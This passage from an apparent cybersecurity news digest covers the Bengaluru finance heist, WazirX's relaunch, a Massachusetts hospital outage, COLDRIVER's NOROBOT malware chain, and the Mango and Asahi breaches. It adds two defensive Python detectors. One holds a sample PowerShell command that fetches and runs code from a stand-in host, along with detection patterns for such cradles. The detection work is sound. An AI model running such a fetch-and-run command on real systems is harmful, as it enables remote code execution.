  4. Stay informed by following updates from auditors and blockchain security firms such as PeckShield and Nansen. 
The impact of the Balancer hack was felt across the broader DeFi market. The BAL token dropped by roughly 5–10% in value, and Balancer’s total value locked (TVL) decreased sharply as liquidity providers withdrew funds amid growing uncertainty. 

CCB’s Cyber Crime Wing Busts ₹47 Crore ($5.6 Million) International Cybercrime Racket Linked to Dubai

cybercrime racket

Bengaluru’s Central Crime Branch (CCB) has dismantled a major international cybercrime racket, revealing a hacking operation that siphoned off ₹47 crore (approximately $5.6 million) from a private finance company in just two and a half hours. The Cyber Crime Wing of the CCB confirmed the arrest of two individuals involved in the scam, while the primary masterminds are suspected to be based in Dubai.

Massive Heist in Just Two and a Half Hours

The financial breach occurred on the night of October 6, when hackers infiltrated the systems of Wisdom Finance Pvt. Ltd. and executed 1,782 unauthorized transactions within a span of two and a half hours. The stolen funds were funneled into 656 different bank accounts across India. According to the complaint filed by a senior manager of Wisdom Finance, the transactions did not originate from the firm’s official systems or registered IP addresses. Instead, they were traced to foreign IPs, notably in Hong Kong and Lithuania. City Police Commissioner Seemant Kumar Singh stated, “This is the first of its kind of case cracked by the CCB team. We have gathered the details of the accused in Dubai, and efforts are on to track them down.” The police also announced a partial recovery of ₹10 crore (approximately $1.2 million) of the stolen funds.

Local Arrests Expose the Indian End of the Cybercrime Racket

The Cyber Crime Wing investigation led to two arrests in India of people who acted as facilitators in the racket. The first suspect, Sanjay Patel, a 43-year-old plumber from Udaipur, Rajasthan, allegedly supplied “mule accounts” used for laundering stolen funds in exchange for a commission. Authorities traced Patel after detecting a suspicious transfer of ₹27,39,000 (around $33,000) into a State Bank of India account linked to him, as reported by The Hindu. Further investigation uncovered another major transaction of ₹5.5 crore (about $650,000) transferred from Wisdom Finance to Unknown Technologies Pvt. Ltd., a Hyderabad-based company. The funds were later routed through a private bank account belonging to another individual. These transfers were traced to IP addresses hosted by Webyne Data Centre, revealing a crucial digital trail. Police later identified Ismail Rasheed Attar, a 27-year-old digital marketing executive from Belagavi, as the person who had purchased the IP addresses used during the heist. Attar, a high school dropout, was arrested shortly after.

Dubai-Based Masterminds Hired Global Hackers

Investigations by the Cyber Crime Wing revealed that two Dubai-based masterminds orchestrated the attack. They reportedly rented five servers using the IP addresses obtained from Attar and then hired hackers from Hong Kong to infiltrate Wisdom Finance’s API systems. By exploiting unspecified security vulnerabilities, the hackers bypassed the company’s internal defenses and initiated the massive fund transfer. The CCB suspects that the Dubai-based operators coordinated their activities using encrypted communication platforms and paid the international hackers through cryptocurrency wallets. The stolen money was quickly moved through hundreds of mule accounts, making it difficult to trace. Although the two arrested suspects were low-level operatives, the evidence recovered, including IP logs, bank transaction records, and communication data, has given investigators leads on the larger network.

Cross-Border Coordination to Combat Cybercrime Rackets

The Cyber Crime Wing continues to collaborate with international law enforcement agencies to locate the primary culprits and recover the remaining funds. Officials noted that this case highlights the global and organized nature of cybercrime rackets, which often operate across multiple countries using advanced technology and digital anonymity. Law enforcement authorities also issued a warning to businesses to tighten their cybersecurity systems, particularly those engaged in large-scale online transactions. They urged financial institutions to implement stricter monitoring tools to detect suspicious activity, especially during late-night hours when such breaches are more likely to occur. The facts of this case point at three controls in particular: transfers should only be accepted from the firm’s registered source addresses, a burst of hundreds of transfers in a short window should trip a velocity limit, and a sudden fan-out to hundreds of previously unseen beneficiary accounts is a mule-network signature in its own right.
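What the monitoring the police are calling for looks like in practice, for the pattern described in this case (transfers from unregistered foreign IPs, at night, in a burst, to hundreds of distinct accounts), is shown below. This is an added example and not code from Wisdom Finance, the CCB or any payment vendor; the IP addresses, account identifiers, amounts and thresholds are constructed or assumed policy values, and the 60-transfer burst is a scaled-down stand-in for the 1,782 transactions in the report.

```python
"""Origin, time-of-day and velocity checks for an API-driven payout system.

Added example for this article, not code from Wisdom Finance or the CCB.
Every IP, account number, amount and threshold below is constructed or an
assumed policy value; nothing here is taken from the investigation.
"""
from collections import deque
from datetime import datetime, time, timedelta

ALLOWED_SOURCE_IPS = {"192.0.2.10", "192.0.2.11"}   # registered gateways (assumed)
BUSINESS_HOURS = (time(9, 0), time(20, 0))          # assumed payout window
WINDOW_SECONDS = 600                                # sliding window length
MAX_TRANSFERS_PER_WINDOW = 50                       # assumed velocity ceiling
MAX_DISTINCT_BENEFICIARIES = 20                     # assumed fan-out ceiling


def assess(transfers, allowed_ips=ALLOWED_SOURCE_IPS):
    """Return one alert per transfer that trips any rule, with the reasons.

    Each transfer is a dict with keys ts (datetime), source_ip, amount and
    beneficiary. Rules are evaluated in arrival order over a sliding window so
    the check can run inline, before the transfer is released.
    """
    window = deque()            # (timestamp, beneficiary) within WINDOW_SECONDS
    alerts = []
    for tx in sorted(transfers, key=lambda t: t["ts"]):
        ts = tx["ts"]
        while window and (ts - window[0][0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()
        window.append((ts, tx["beneficiary"]))

        reasons = []
        if tx["source_ip"] not in allowed_ips:
            reasons.append("unregistered_source_ip")
        if not BUSINESS_HOURS[0] <= ts.time() < BUSINESS_HOURS[1]:
            reasons.append("off_hours")
        if len(window) > MAX_TRANSFERS_PER_WINDOW:
            reasons.append("velocity")
        if len({b for _, b in window}) > MAX_DISTINCT_BENEFICIARIES:
            reasons.append("beneficiary_fanout")
        if reasons:
            alerts.append({"ts": ts.isoformat(), "source_ip": tx["source_ip"],
                           "amount": tx["amount"], "reasons": reasons})
    return alerts


def _benign():
    """Constructed daytime activity from registered gateways."""
    day = datetime(2025, 10, 6)
    return [
        {"ts": day.replace(hour=11, minute=0), "source_ip": "192.0.2.10",
         "amount": 25000, "beneficiary": "ACCT-A"},
        {"ts": day.replace(hour=11, minute=5), "source_ip": "192.0.2.11",
         "amount": 12500, "beneficiary": "ACCT-B"},
        {"ts": day.replace(hour=14, minute=30), "source_ip": "192.0.2.10",
         "amount": 8000, "beneficiary": "ACCT-A"},
    ]


def _burst():
    """Constructed night-time burst: 60 transfers, 2 s apart, from an
    unregistered address, each to a never-seen-before beneficiary."""
    start = datetime(2025, 10, 6, 23, 10)
    return [
        {"ts": start + timedelta(seconds=2 * i), "source_ip": "203.0.113.44",
         "amount": 263000, "beneficiary": f"MULE-{i:03d}"}
        for i in range(60)
    ]


BENIGN_TRANSFERS = _benign()
SAMPLE_TRANSFERS = BENIGN_TRANSFERS + _burst()


if __name__ == "__main__":
    for alert in assess(SAMPLE_TRANSFERS)[:3]:
        print(alert)
    print(f"{len(assess(SAMPLE_TRANSFERS))} of {len(SAMPLE_TRANSFERS)} transfers flagged")
```

The source-IP and off-hours rules fire on the very first transfer of the burst, which is the point: an inline check would have blocked or held the first unauthorized payout rather than the 1,783rd. The velocity and fan-out rules are there for the case where the attacker does come from a registered address during business hours, for instance through a compromised internal host.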

WazirX to Resume Exchange Operations After 15-Month Hiatus Following Cyberattack

WazirX

WazirX, one of India’s popular cryptocurrency exchanges, is set to restart its operations on October 24, nearly 15 months after a cyberattack forced the platform to halt all activities. The decision to resume trading follows the approval of WazirX’s restructuring plan by Singapore’s High Court. In July 2024, WazirX experienced a devastating cyberattack that resulted in the loss of approximately 45% of its crypto assets, valued at $234 million. This breach compelled the platform to suspend its operations indefinitely, leaving its user base without access to trading or withdrawals during a period when the cryptocurrency market witnessed substantial growth. Token prices surged across the board, increasing the stakes for users awaiting the platform’s reopening.

Court Approval and Restructuring Scheme 

Earlier this year, WazirX proposed a restructuring scheme aimed at recovering and redistributing tokens covering nearly 85% of creditors’ balances. This plan requires majority approval from its user base. Following a re-vote in August, a striking 95.7% of voting creditors, accounting for 94.6% by value, endorsed the revised scheme.  The High Court of Singapore officially sanctioned the restructuring plan in mid-October, paving the way for the exchange’s return to the market. This court’s approval was a critical step for WazirX, as it legitimizes the company’s approach to restoring user funds and relaunching services. 

WazirX Relaunch Strategy and User Benefits 

WazirX’s comeback will begin with a selected set of crypto-to-crypto trading pairs, along with the USD/INR pair, with plans to expand market offerings gradually. To incentivize users during this relaunch phase, WazirX is introducing a "Restart Offer," which waives trading fees across all pairs for users. While the exchange’s token rebalancing page is already live, enabling users to view their adjusted holdings, WazirX is still finalizing features related to withdrawals and trading. In preparation for the relaunch, the platform completed a series of technical updates, including token swaps, mergers, delistings, migration, and any necessary rebranding. To strengthen security and transparency going forward, WazirX has partnered with BitGo, a well-known digital asset trust company, to safeguard users’ funds.

Reaffirming Commitment 

Nischal Shetty, the founder of WazirX, addressed the community on the occasion of the relaunch. Expressing gratitude for the users’ patience during the difficult period, Shetty highlighted the company’s dedication to making cryptocurrency accessible to every Indian.

“This isn’t just a return to operations; it’s a reinforcement of our integrity, which we’ve always strived for,” Shetty remarked. His message underscored the exchange’s determination not only to resume trading but to emerge stronger and more reliable in the crypto landscape.

The resumption of WazirX’s operations marks a notable recovery from one of the most challenging periods the exchange has faced. The cyberattack in mid-2024 had a profound impact on both the company and its users, but the successful court-approved restructuring and partnership with BitGo suggest a more secure and transparent future.

Cyberattack Disrupts Operations at Heywood and Athol Hospitals in Massachusetts


A cyberattack on hospitals in North Central Massachusetts has caused major operational disruptions at Heywood Hospital in Gardner and Athol Hospital, a smaller critical access facility in Athol. Both hospitals are operated by Heywood Healthcare, a non-profit organization serving the region.

The incident, which was first detected last week, led to an immediate network shutdown as part of emergency response protocols to contain the breach and protect patient data and hospital systems. Following detection, a “Code Black” was declared, a designation used in healthcare settings to indicate a critical system outage, and emergency departments were closed to ambulance arrivals. Ambulances had to be rerouted to other regional hospitals due to system inaccessibility.

Decoding the Athol and Heywood Hospital Cyberattack

The hospital cyberattack disrupted vital services, including Internet access, email communication, and phone lines. Radiology and laboratory operations were also affected. While communication systems have since been partially restored, hospital officials confirmed on October 16, 2025, that the outage was due to a cybersecurity incident. A third-party cybersecurity firm has been brought in to investigate the breach and support recovery efforts.

Despite the disruption, both Heywood Hospital and Athol Hospital have remained open for patient care, including outpatient services provided by Heywood Medical Group. Officials stressed that patient safety remains the top priority, and that care delivery continues, though some services are operating at reduced capacity.

As a temporary workaround, the Athena patient portal has been made accessible to facilitate communication between patients and providers. Patients unable to access the portal are advised to use the hospital’s answering service.

Why is the Healthcare Sector a Prime Target for Cybercriminals?

Healthcare facilities are prime targets for cybercriminals, particularly ransomware groups. According to a recent study conducted by the Ponemon Institute, 93% of healthcare organizations surveyed experienced a cybersecurity incident in the past year. Alarmingly, 72% of those incidents led to patient care disruptions, highlighting the direct impact such breaches have on healthcare delivery.

The same study pointed to consequences such as appointment cancellations, delayed intakes, extended hospital stays, worsened patient outcomes, and even increased mortality rates following cyberattacks. These findings emphasize the potentially life-threatening implications of cybersecurity lapses in healthcare environments.

Investigation Ongoing, No Timeline for Full Recovery 

Heywood Hospital and Athol Hospital continue to work with cybersecurity professionals to investigate the breach and restore normal operations. While communication tools and some functions are back online, full system functionality has yet to be reestablished, and no specific timeline has been shared publicly.

The hospitals have not confirmed whether ransomware was involved, nor have they reported any evidence of stolen or exposed patient data. Heywood Healthcare has assured the public that it will continue to monitor the situation and provide updates as more information becomes available.

Russian State-Sponsored COLDRIVER Group Deploys New Malware After Exposure of LOSTKEYS


Following the public disclosure of its LOSTKEYS malware in May 2025, the Russian state-sponsored threat group known as COLDRIVER, also tracked under aliases such as UNC4057, Star Blizzard, and Callisto, has rapidly evolved its cyber operations. According to research from the Google Threat Intelligence Group (GTIG), the group abandoned LOSTKEYS just five days after its exposure and began deploying new malware strains that demonstrate a significant escalation in development speed and operational aggression. COLDRIVER, a persistent threat group targeting high-profile individuals associated with NGOs, policy think tanks, and political dissidents, has shown adaptability and persistence in the face of increased scrutiny. GTIG reports that the group's latest efforts involve a chain of related malware families, delivered via a mechanism mimicking a CAPTCHA prompt, an evolution of its earlier COLDCOPY lures.

NOROBOT and the Infection Chain 

The main part of the campaign is NOROBOT, a malicious DLL file first distributed using a lure called “ClickFix.” This technique impersonates a CAPTCHA challenge, prompting users to verify that they are "not a robot" (hence the malware name). Once the user runs the file via rundll32, NOROBOT initiates a sequence that connects to a hardcoded command-and-control (C2) server to retrieve the next stage of the malware.

GTIG notes that NOROBOT underwent continuous updates between May and September 2025. Initial versions fetched and installed a full Python 3.8 environment, which was then used to run a backdoor dubbed YESROBOT. This method left obvious traces, such as the Python installation, that could trigger alerts. As a result, COLDRIVER later replaced YESROBOT with a more streamlined and stealthier PowerShell-based backdoor: MAYBEROBOT.

NOROBOT’s earlier iterations relied on cryptographic obfuscation, splitting AES keys across various components. For instance, part of the key was stored in the Windows Registry, while the rest was embedded in downloaded Python scripts such as libsystemhealthcheck.py. These files, hosted on domains such as inspectguarantee[.]org, were essential to decrypt and activate the final backdoor.

YESROBOT: A Short-Lived Backdoor 

YESROBOT, a minimal Python backdoor, was observed only twice over a two-week window in late May 2025. Commands were AES-encrypted and issued over HTTPS, with system identifiers included in the User-Agent string. However, its limitations, such as the need for a full Python interpreter and lack of extensibility, led COLDRIVER to abandon it quickly.

GTIG believes YESROBOT served as a stopgap solution, hastily deployed after LOSTKEYS was exposed. The effort to maintain operational continuity suggests that COLDRIVER was under pressure to re-establish footholds on previously compromised systems.

MAYBEROBOT: COLDRIVER's New Standard 

In early June 2025, GTIG identified a simplified version of NOROBOT that bypassed the need for Python altogether. This new variant fetched a single PowerShell command, which established persistence via a logon script and delivered a heavily obfuscated script known as MAYBEROBOT (also referred to as SIMPLEFIX by Zscaler).

MAYBEROBOT supports three functions: 
  • Download and execute code from a specified URL. 
  • Run commands using cmd.exe. 
  • Execute PowerShell blocks. 
It communicates with the C2 server using a custom protocol, sending acknowledgments and command outputs to predefined paths. Although minimal in built-in functionality, MAYBEROBOT's architecture is more adaptable and stealthy compared to YESROBOT.

GTIG assesses that this evolution marks a deliberate shift by COLDRIVER toward a more flexible toolset that avoids detection by skipping Python installation and minimizing suspicious behavior.
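The chain described in the two sections above (a DLL launched through rundll32 from a ClickFix lure, a PowerShell stage that fetches more code, and logon-script persistence) leaves three observable steps in endpoint telemetry. As an added example, not code from the article or from GTIG's report, the following Python correlates those steps over constructed Sysmon-style process and registry events. The event layout, file and host names, the example.invalid URL and the `UserInitMprLogonScript` registry value (a widely documented logon-script persistence location; the report does not name the exact key COLDRIVER used) are assumptions made for illustration.

```python
"""Defender-side correlation of the NOROBOT -> MAYBEROBOT chain in telemetry.

Added example, not code from the article or from GTIG. Event shape is a
simplified Sysmon-style record (assumed). It flags:
  1. rundll32 loading a DLL from a user-writable directory (the ClickFix lure),
  2. a PowerShell child of that rundll32 whose command line fetches or decodes code,
  3. a logon-script persistence write (UserInitMprLogonScript, assumed location).
All sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    ts: int            # ordering timestamp (constructed)
    kind: str          # "process" or "registry"
    pid: int
    ppid: int = 0
    image: str = ""    # executable path (process events)
    cmdline: str = ""  # full command line (process events)
    key: str = ""      # registry value path (registry events)
    data: str = ""     # registry value data (registry events)


# Directories an ordinary user can write to; a DLL run from here is suspicious.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop)\\", re.I)
# The DLL path argument handed to rundll32 (optionally quoted).
DLL_ARG = re.compile(r'"?([a-z]:\\[^",]+?\.dll)"?', re.I)
# Common "fetch or decode and run" markers in PowerShell command lines.
PS_FETCH = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|-enc", re.I)
# Logon-script persistence value (assumed location, see module docstring).
LOGON_SCRIPT = re.compile(r"\\environment\\userinitmprlogonscript$", re.I)


def triage(events):
    """Return the findings in event order and whether all three steps were seen."""
    flagged_rundll32 = set()   # pids of rundll32 instances that loaded a user-writable DLL
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        image = e.image.lower()
        if e.kind == "process" and image.endswith("rundll32.exe"):
            m = DLL_ARG.search(e.cmdline)
            if m and USER_WRITABLE.search(m.group(1)):
                flagged_rundll32.add(e.pid)
                findings.append(("rundll32_user_writable_dll", e.pid, m.group(1)))
        elif e.kind == "process" and image.endswith("powershell.exe"):
            # Only a PowerShell spawned by a flagged rundll32 counts as the stager.
            if e.ppid in flagged_rundll32 and PS_FETCH.search(e.cmdline):
                findings.append(("powershell_stager_from_rundll32", e.pid, e.cmdline))
        elif e.kind == "registry" and LOGON_SCRIPT.search(e.key):
            findings.append(("logon_script_persistence", e.pid, e.data))
    seen = {name for name, _, _ in findings}
    return {"findings": findings, "chain_complete": len(seen) == 3}


# Constructed sample telemetry: one benign rundll32 launch, then the three-step chain.
SAMPLE_EVENTS = [
    # Benign: a system DLL run from System32 must not fire.
    Event(1, "process", 400, 300, r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    # Step 1: DLL dropped by a fake CAPTCHA page, run from Downloads (constructed path).
    Event(2, "process", 501, 320, r"C:\Windows\System32\rundll32.exe",
          r'rundll32.exe "C:\Users\alice\Downloads\captcha_check.dll",Start'),
    # Step 2: its PowerShell child pulls the next stage (constructed URL).
    Event(3, "process", 502, 501,
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
          ".DownloadString('https://example.invalid/stage')\""),
    # Step 3: logon-script persistence written by that PowerShell process.
    Event(4, "registry", 502, key=r"HKCU\Environment\UserInitMprLogonScript",
          data=r"C:\Users\alice\AppData\Roaming\update.cmd"),
]


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for name, pid, detail in result["findings"]:
        print(f"{name:34s} pid={pid} {detail}")
    print("chain complete:", result["chain_complete"])
```

The value of correlating rather than alerting on each step alone is that each step is also seen in benign activity (rundll32 is a normal Windows host process, PowerShell download cradles appear in admin scripts, and logon scripts are a legitimate feature); requiring the PowerShell process to be a child of a rundll32 that loaded a user-writable DLL keeps the benign System32 event in the sample from contributing to the chain.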

COLDRIVER’s Continuous Malware Evolution 

From June through September 2025, GTIG observed COLDRIVER continuously refining NOROBOT and its associated delivery chains. These changes include: 
  • Rotating file names and infrastructure. 
  • Modifying DLL export names and paths. 
  • Adjusting complexity to balance between stealth and operational control. 
Interestingly, while NOROBOT has seen multiple iterations, MAYBEROBOT has remained largely unchanged, suggesting the group is confident in its current capabilities. 

Mango Data Breach Exposes Limited Customer Details After Third-Party Cyberattack

16 October 2025 at 05:27


Spanish fashion retailer Mango has confirmed a data breach after one of its external marketing service providers suffered unauthorized access to limited customer information. The company emphasized that its corporate systems were not compromised and that financial or login details remain secure. The Mango data breach adds to a growing list of cybersecurity incidents hitting major global retailers in 2025. In its official statement, Mango said the exposed data included customers’ first names, countries, postal codes, email addresses, and phone numbers. The company clarified that last names, banking information, credit card details, or passwords were not affected in the breach. “Mango’s infrastructure and corporate systems have not been compromised,” the company said, assuring customers that normal operations continue. Upon discovering the breach, Mango immediately activated its security protocols and notified the Spanish Data Protection Agency (AEPD) and relevant authorities as required under data protection laws. The retailer also urged customers to remain cautious of suspicious emails or phone calls and avoid sharing personal details with unknown sources. For assistance, Mango has made its customer service email and helpline available to address any concerns.

Mango Responds Swiftly to Contain Data Breach

According to the company, the Mango data breach was limited to marketing-related data held by an external provider. This incident did not involve Mango’s main network or systems handling sensitive information. The fashion retailer said it took “immediate action” to contain the issue and ensure no further exposure. Mango reiterated its commitment to privacy, stating, “We regret any inconvenience this specific incident may have caused. The protection of our customers’ data remains a top priority.” The Spanish Data Protection Agency (AEPD) has been informed, and Mango continues to cooperate fully with authorities as investigations continue.

Retail Cybersecurity Under Pressure Amid Global Attacks

The Mango data breach comes amid a series of high-profile retail cyberattacks across Europe and the United States this year. Just weeks earlier, luxury fashion house Louis Vuitton disclosed a cyberattack, the third within 90 days, that exposed customer data from its global and Korean operations. The LVMH cyberattack, confirmed on July 2, 2025, affected personal information but not payment data. In May, Victoria’s Secret also reported a security incident that forced the company to temporarily take down its U.S. website while investigations were ongoing. Meanwhile, UK logistics firm Peter Green Chilled, a supplier to supermarkets like Tesco and Sainsbury’s, experienced a cyberattack that disrupted operations. Luxury retailer Harrods was another recent victim, confirming a Harrods cyberattack in April 2025 that prompted precautionary restrictions on internet access at its sites. Although customer services remained active, the incident highlights the increasing pressure on retail cybersecurity worldwide.

Mango Maintains Strong Business Performance Despite Data Breach

Despite the recent Mango data breach, the company’s business continues to show strong growth. The company reported a turnover of €1.728 billion in the first half of 2025, marking a 12% increase year-over-year and a 14% growth at constant exchange rates. The retailer invested around €110 million in strategic projects during this period, with 70% allocated to new store openings and refurbishments. With a presence in 120 countries and 2,925 points of sale worldwide, Mango’s international business now represents 78% of total turnover. Its top-performing markets include Spain, France, Turkey, Germany, and the United States.

Ongoing Focus on Customer Trust and Cyber Resilience

As the Mango data breach investigation continues, the retailer is reinforcing its cybersecurity measures and reviewing third-party security policies to prevent similar incidents in the future. The company said it remains committed to transparency and the protection of customer data.

“MANGO makes our Customer Service email address (personaldata@mango.com) and telephone number (900 150 543) available for any additional questions, and we regret any inconvenience this specific incident may have caused you,” reads the company’s statement. “As always, we want to thank you for your trust and commitment to our brand,” the statement concluded.

Asahi Group Cyberattack Forces Delay in Financial Reporting

15 October 2025 at 01:47


Japanese beverage and food giant Asahi Group Holdings has confirmed that a ransomware attack has disrupted its operations and may have led to a leak of personal and financial data. The Asahi Group cyberattack has forced the company to delay the release of its financial results for the January–September period, which was originally scheduled for November 12, 2025. The cyberattack on Asahi Group, which occurred on September 29, 2025, caused a major system disruption across Asahi’s domestic operations, suspending automated order and shipment processes. Despite the challenges, the company has prioritized maintaining product supply and has begun manual order processing and partial shipments to customers.

Asahi Group Cyberattack Claimed by Qilin

A hacker group calling itself Qilin claimed responsibility for the ransomware attack on October 7, alleging it had stolen more than 9,300 data files, including employee personal information and financial records. The following day, Asahi confirmed that some of the data claimed to be stolen was indeed found online. Investigations are ongoing to determine the extent of the Asahi Group data breach and the nature of the compromised data. The company stated that while the incident impacted its technology infrastructure in Japan, there is currently no indication that systems or data outside Japan were affected. “As part of our ongoing investigation, we have confirmed that data suspected to have been transferred without authorization has been found on the internet,” the company said. “We are conducting an investigation to determine the nature and scope of the information that may have been subject to unauthorized transfer. Should the investigation confirm any impact from unauthorized data transfer, notifications will be delivered promptly.”

Operational Recovery Underway

The Asahi Group ransomware attack temporarily halted operations at Asahi’s domestic production facilities. However, gradual recovery efforts have been underway since early October.
  • Asahi Breweries resumed production at all six of its factories on October 2, with partial shipments of Asahi Super Dry restarting soon after. From October 15, shipments of other products such as Asahi Draft Beer and Asahi Dry Zero are set to partially resume.
  • Asahi Soft Drinks began partial production at six of its seven domestic factories by October 8, and all seven factories are expected to resume operations by October 9.
  • Asahi Group Foods has also partially resumed production at all seven of its domestic facilities.
Despite these progress updates, Asahi’s systems have yet to be fully restored, and no clear timeline for complete recovery has been provided. The Asahi Group cyberattack has also delayed access to critical accounting-related data, which has impacted the company’s ability to finalize its third-quarter financial reports.

Financial Reporting Delayed

In its official statement, Asahi Group said the delay in its financial disclosures was necessary to ensure accuracy and compliance. “The Company sincerely apologizes for any inconvenience this postponement may cause to its shareholders, investors, and other stakeholders,” the statement read. The firm added that it is reviewing the impact of the system disruption on its financial performance and will announce a new disclosure date once restoration efforts progress further. The company has assured that updates regarding the Asahi Group cyberattack, its financial results, and any confirmed data exposures will be made promptly and transparently.